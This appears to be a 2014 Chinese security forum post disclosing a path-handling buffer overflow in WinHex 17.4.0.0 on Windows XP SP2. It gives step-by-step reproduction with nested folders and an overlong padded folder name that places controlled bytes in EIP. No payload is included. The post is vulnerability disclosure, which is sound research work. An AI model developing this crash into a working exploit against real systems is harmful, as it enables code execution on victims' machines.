-
-
[原创]WINHEX缓冲区溢出漏洞
-
发表于:
2014-3-12 15:17
3552
-
处理路径的时候存在缓冲区溢出漏洞
EIP可控
Winhex 最新版 17.4.0.0
测试系统:winXP SP2
第一步:建立如下文件夹
C:\1111111111111111\2222222222222222\3333333333333333\
第二步:把Winhex程序放在下面文件夹下(注意:程序在该文件夹下的根目录下)
WinHex44444444444444444444444444444444444444444444444444444444444
44444444444444444444444444444444444444444444444444444444444444444
4444444444444444444444444444444444AAAAAAAAAAAAAAAAAAAAAACC
(注意C的ASICC是 43H)
第三步:把第二步建立的文件夹放在第一步建立的文件夹内
最终结果是
C:\1111111111111111\2222222222222222\3333333333333333\WinHex44444
44444444444444444444444444444444444444444444444444444444444444444
44444444444444444444444444444444444444444444444444444444444444444
44444444444444444444444AAAAAAAAAAAAAAAAAAAAAACC
第四步:运行Winhex.exe 可发现EIP可控
(文件目录不要过长,否则会导致实验失败)
EIP就是文件目录中CC的位置
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!